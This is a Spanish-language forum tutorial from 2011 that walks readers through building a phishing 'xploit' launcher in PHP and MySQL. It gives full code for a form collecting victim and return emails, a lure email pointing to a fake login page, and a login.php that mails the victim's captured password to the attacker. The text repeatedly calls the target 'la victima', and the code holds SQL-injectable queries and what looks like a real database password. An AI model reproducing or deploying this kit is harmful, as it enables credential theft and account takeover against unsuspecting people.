Crear Lanzador De Xploits Con Retorno

Ver el tema anterior Ver el tema siguiente Ir abajo

Crear Lanzador De Xploits Con Retorno

Mensaje  [G]host el Vie Ene 21, 2011 7:00 am

Antes de comenzar con los Xploits hay un par de cositas que deben tener ya en claro. Como por ejemplo, el método post, get, y la función mail() principalmente.
Pero les recomiendo que lean sobre PHP y MySQL para que no tengan que hacer mucho copy & paste jaja.
Otra cosa es que me gustaría que si lo copian a otra Web mencionen el autor porque me llevo bastante tiempo hacerlo.

POST: Utilizada para capturar valores enviados desde un formulario.
Por ejemplo. En una página hay un formulario donde te pide el nombre y luego los datos son procesados en una pagina PHP en la cual mediante el método post tomamos el valor enviado y lo imprimimos.
Vamos a hacer un script sencillo para que quede aun mas claro:



<html>
<head>
<title>Prueba N 1</title>
</head>
<body>
<form method="POST" action="nombre.php">
<p>Nombre: <input type="text" name="T1" size="20"></p>
<p><input type="submit" value="Enviar" name="B1"></p>
</form>
</body>
</html>


Este seria el formulario y luego la pagina nombre.php seria:


<?php
$nombre=$_POST[‘nombre’];
?>
<html>
<head>
<title>Tu Nombre</title>
</head>
<body>
Tu nombre es: <?php echo $nombre ?>
</body>
</html>


Ahora pasemos al siguiente método.

GET: Al igual que post sirve para capturar un valor. La diferencia es que post es para capturar los datos enviados desde un formulario, como mencione anteriormente y get sirve para tomarlo desde una URL.
Por ejemplo, tenemos un archivo PHP como el siguiente:


<?php
$nombre=$_GET[‘nombre’];
?>
<html>
<head>
<title>Tu Nombre</title>
</head>
<body>
Tu nombre es: <?php echo $nombre ?>
</body>
</html>


Esto lo que hace es capturar el valor con GET y luego lo imprime en la pagina.
Pero… de donde captura este valor?
De la URL. Cuando creamos un hipervínculo o pasamos un link que requiera el envío de datos mediante GET debe ser:

www.tudominio.com/pagina.php?nombre=juan

Es decir, primero la URL de la página. Luego un signo de pregunta (?), luego el nombre del valor a tomar que luego cuando insertamos el get debemos especificarlo

$nombre=$_GET[‘nombre’];

Luego un igual, y por ultimo el valor asignado.

También tenemos otro método que no lo vamos a utilizar pero creo que no estaría de menos decirlo ya que estoy haciendo este tuto y es el request.

REQUEST: El request engloba el post y el get. Puedes usarlo para cualquiera de los dos.

Ahora voy a pasar a comentarles sobre la función mail()

MAIL(): Esta función sirve para enviar un correo electrónico desde una página PHP.
Es muy probable que en muchos posting gratis no sirva como por ejemplo en mi@ que la tiene bloqueada. Por su parte 000webhost no lo tiene bloqueado.
Esta función es muy útil para tener que evitar el molesto mailto ya que es mucho mas practico, mas dinámico, se envía desde tu propia Web mediante un formulario que puedes personalizar a tu gusto, etc…
Algo que es importante mencionar es que podemos enviar mensajes de texto plano, como si fuera un email cualquiera, o mensajes utilizando HTML que es el tipo de menajes que se utiliza cuando se envían xploits.

SINTAXIS: mail(“email”, “asunto”,”mensaje”,”enzabezados”);

El Email es el mail a donde queremos enviar el mensaje. Por ejemplo si queremos enviárselo a juan@hotmail.com eso es lo que debemos poner allí.
El asunto, es como ya saben, el asunto que llevará el mensaje.
Luego el mensaje, es el cuerpo del mensaje, lo que queremos enviarle.
Luego los encabezados que es muy importante y es donde se especifican cosas como si se va a enviar una copia a otra persona, una copia oculta, si va a ser en formato HTML, quien envía el mensaje, etc…

Los lanzadores de Xploits con retorno funcionan de la siguiente manera..
Mediante un formulario se pide los datos para enviar el xploit. En la URL que lleva al fake se toma mediante get el correo de retorno y luego se envía el mensaje.

¿Qué ventajas tiene esto?
Sencillo. Que el pass te llega a tu correo y no tienes que andar buscándolo.

¿Qué desventaja tiene esto?
También sencillo. Que la victima si se llega a dar cuenta del engaño con solo mirar la URL podrá saber el email de retorno de su contraseña y podrá descubrirte.

¿Se puede enviar un xploit sin correr este riesgo con retorno?
Si se puede. Hasta ahora de todos los lanzadores que vi ninguno usa la misma técnica que acabo de usar yo para hacer el script. No es que nadie sepa ni mucho menos pero quizá a nadie se le ocurrió hacerlo de esta manera.

El funcionamiento de mis Xploits es el siguiente…. Les voy a ir explicando y mostrando el código y finalmente podrán descargar el script ya finalizado.

[+] index.htm
Bueno esta página tiene un formulario donde te pide el email de la victima y el email de retorno. La acción del formulario es enviar.php


<html>

<head>
<meta http-equiv="Content-Language" content="es">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Xploits By HaCkBS</title>
</head>

<body text="#FFFFFF" bgcolor="#000000">

<form method="POST" action="enviar.php">
<p align="center"><u><font face="Arial Unicode MS" size="5">XPLOIT</font></u></p>
<p><font face="Arial Unicode MS">Email De La Victima:
<input type="text" name="victima" size="20"></font></p>
<p><font face="Arial Unicode MS">Email De Retorno:
<input type="text" name="retorno" size="20"></font></p>
<p><input type="submit" value="Enviar" name="B1"></p>
</form>

</body>

</html>



[+] enviar.php
Esta página lo que haría seria… tomar mediante post los datos enviados desde el formulario de index.htm, guardaría los datos del email de la victima y el email de retorno en una base de datos y finalmente enviaría el xploit con la URL del fake que si ven esta preparado de tal modo que luego pueda tomar el email de la victima mediante un get.. Luego verán para que quiero hacer esto.


<?php
$victima=$_POST['victima'];
$retorno=$_POST['retorno'];
$conexion=mysql_connect("localhost","tuusuario","tupass" or die('Problemas de conexion');
mysql_select_db("tubasededatos", $conexion) or die('Problemas de seleccion de la base de datos');
mysql_query("insert into xploit (victima,retorno) values ('$victima','$retorno')" or die('Problemas con la consulta SQL');
mysql_close($conexion);
$destino="$victima";
$asunto = 'Aqui el asunto del xploit';
$encabezados .= "Content-type: text/html; charset=UTF-8\n";
$encabezados .= "From: ejemplo@gusanito.com.mx\r\nContent-type: text/html\r\n";
$mensaje="<p>Bueno este seria el mensaje del xploit con el link a un fake... para ver un ejemplo hagan click <a href='www.tupagina.com /fake.php?email=$victima'>aqui</a></p>";
mail($destino, $asunto, $mensaje, $encabezados) or die('Hubo un error');
?>
<html>
<head>
<title>Enviado...</title>
<body bgcolor="#000000">
<p><font color="#FFFFFF">Xploit enviado correctamente. Gracias por utilizar nuestro servicio</font></p>
</body>
</html>



Prosigamos…
[+] fake.php

Aquí es donde tendría que estar su Fake.
Como podrán ver el campo del email se completó automáticamente con el correo de la victima para que no deba escribirlo. Esto lo hice poniendo como value del campo de texto el email de la victima que lo tome con get.
Cuando la victima pone la contraseña e incia sesión pasamos a la pagina login.php



<?php
$mail=$_GET['email'];
?>
<html>

<head>
<meta http-equiv="Content-Language" content="es">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Xploits By HaCkBS</title>
</head>

<body text="#FFFFFF" bgcolor="#000000">

<p align="center"><font size="4" face="Arial Unicode MS">Este seria el Fake.
Obviamente deben hacerlo ustedes y las personas tendrían que colocar su usuario
y contraseña...</font></p>
<form method="POST" action="login.php">
<p align="center"><font face="Arial Unicode MS">Usuario:
<input type="text" name="user" size="20" value="<?php echo $mail ?>"><br>
Contraseña: <input type="text" name="pass" size="20"></font></p>
<p align="center"><input type="submit" value="Enviar" name="B1"></p>
</form>
<p align="center">&nbsp;</p>

</body>

</html>


[+] login.php

Por último viene el login.php
Este archivo lo que hará será procesar los datos enviados por el formulario anterior.
Mediante post toma los datos del usuario y contraseña.
Luego hace una llamada a la base de datos buscando el registro del mail ingresado por la victima, entonces busca el email de retorno el cual se grabo en la base de datos cuando nosotros enviamos el email y por ultimo utilizando la función mail() envía un correo de retorno con la contraseña y el email de nuestra victima.



<?php
$user=$_POST['user'];
$pass=$_POST['pass'];
$conexion=mysql_connect("localhost","programa_xpl","hackbsmanda" or die('Problemas de conexion');
mysql_select_db("programa_xpl",$conexion) or die('Problemas en la seleccion de la base de datos');
$registros=mysql_query("select * from xploit where victima='$user'", $conexion) or die('Problemas en la consulta SQL');
while($reg=mysql_fetch_array($registros))
{
$victima=$reg[victima];
$retorno=$reg[retorno];
}
$destino="$retorno";
$asunto = 'Has recibido una contraseña';
$encabezados .= "Content-type: text/html; charset=UTF-8\n";
$encabezados .= "From: ejemplo@gusanito.com.mx\r\nContent-type: text/html\r\n";
$mensaje ="<p>Te informo que tu victima ha caido. Su email es $victima y su pass es $pass</p>";
mail($destino, $asunto, $mensaje, $encabezados) or die('Hubo un error');
?>
<html>
<head>
<title>Aqui lo que sea</title>
</head>
<body>
la victima ya nos dio su pass, ahora la podemos llevar a donde queramos para que no se de cuenta de la trampa
</body>
</html>


Para finalizar el código MySQL para la base de datos seria:


create table xploit(
codigo integer not null auto_increment,
victima varchar(30) not null,
retorno varchar(30) not null,
primary key(codigo)
);





NOTA: recomendaciones para entender el post al 100%

www.phpya.com.ar
www.htmlya.com.ar
www.mysqlya.com.ar

avatar
[G]host
Admin

Mensajes : 67
Puntos : 204
Reputación : 0
Fecha de inscripción : 24/10/2010
Edad : 26

Ver perfil de usuario http://ghost.activo.mx

Volver arriba Ir abajo

Ver el tema anterior Ver el tema siguiente Volver arriba

- Temas similares

 
Permisos de este foro:
No puedes responder a temas en este foro.